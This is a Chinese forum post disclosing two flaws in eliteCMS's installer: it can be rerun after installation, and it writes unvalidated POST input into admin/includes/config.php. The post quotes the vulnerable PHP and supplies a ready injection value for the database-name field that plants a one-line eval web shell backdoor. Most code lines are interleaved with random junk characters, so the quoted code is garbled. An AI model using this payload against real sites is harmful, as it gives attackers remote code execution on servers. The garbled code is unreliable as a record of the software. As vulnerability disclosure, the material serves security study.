eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装) B; e$ h5 F5 u R+ A. v# |) I; }
9 l; o; u$ m% G* p/ K- l
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
2 `2 v- H$ X% H$ X' z我们来看代码:
9 \( k) L% U. K8 A
" h8 B* x/ B2 D* f) I, g- K# X" \...: C9 g$ I S _. d9 j
elseif ($_GET['step'] == "4") {& \7 ^7 X, k8 i& ]2 C. p( X- F, F
$file = "../admin/includes/config.php";
7 O2 H$ f( O! x$ h8 p/ w6 T( y $write = "<?php\n";
/ Z. c* E5 N7 R0 z- m& k, P% o $write .= "/**\n";! s/ T2 k* Y' H y& E3 }- _
$write .= "*\n";. O; c8 ]3 c" H, w8 k( a
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";0 D$ w$ r/ |1 S/ j" a) `
...略...: k8 v0 N4 q+ h2 X" D% }
$write .= "*\n";
" W7 S M, K4 I7 T $write .= "*/\n";; `5 R# x0 }+ T- N
$write .= "\n";8 O4 k7 h& {4 H, l
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
7 z! K( s) C+ X7 e$ { $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% M4 n. \4 d6 r/ a0 x3 r $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
9 n. v% n& k% ^5 `" U5 E $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ ~$ X. d1 X6 r l $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";& t" o! _9 m* x
$write .= "if (!\$connection) {\n";
/ R2 x t' T- Q! N $write .= " die(\"Database connection failed\" .mysql_error());\n";
& O8 l4 e9 j a$ V1 d2 ?7 j6 H $write .= " \n";
& l# }1 E4 B2 x2 r, G- @ $write .= "} \n";
2 }2 m$ D9 ]7 }$ @ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
; B/ W$ a$ }. H# w$ c $write .= "if (!\$db_select) {\n";! x5 Y5 [' S; H' H) ?2 W( _
$write .= " die(\"Database select failed\" .mysql_error());\n";; j" r6 n) `) o
$write .= " \n";9 M" x1 g1 r7 [- x! M
$write .= "} \n";7 F* n4 f: X; C8 g- e( q
$write .= "?>\n";5 f8 x4 a9 o& I" S
# h! x, b' R( C
$writer = fopen($file, 'w');
4 E1 a X+ j( ~$ z...1 P. G3 \; s8 _ Y+ f& s) q
: x) r7 t% V' G" `6 _/ t* o* Q在看代码: j( q4 y+ \4 ~) P$ W% o
7 R9 |0 j3 [2 P j! k$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];' ]8 ], D% u/ d; _ K# h: D+ p# ~
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];& ^! J; e2 {( @
$_SESSION['DB_USER'] = $_POST['DB_USER'];, x( H% I$ X5 ?! H& O
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
% J" ^" Z" y2 `/ Q2 G, x4 @ & \$ u) l& K7 u9 \( O) A
取值未作任何验证
/ o9 M% b, y0 T1 \, \9 U如果将数据库名POST数据:
1 D1 e" r$ f$ Y% A7 J , t1 H+ \# U- M8 v
"?><?php eval($_POST[c]);?><?php9 i3 D" m9 x5 B& a+ D
& L" G6 _* I( f Z将导致一句话后门写入/admin/includes/config.php$ s# L- N) [5 {4 I1 Y
|
发表于 2012-11-18 13:59:27
收藏
支持
反对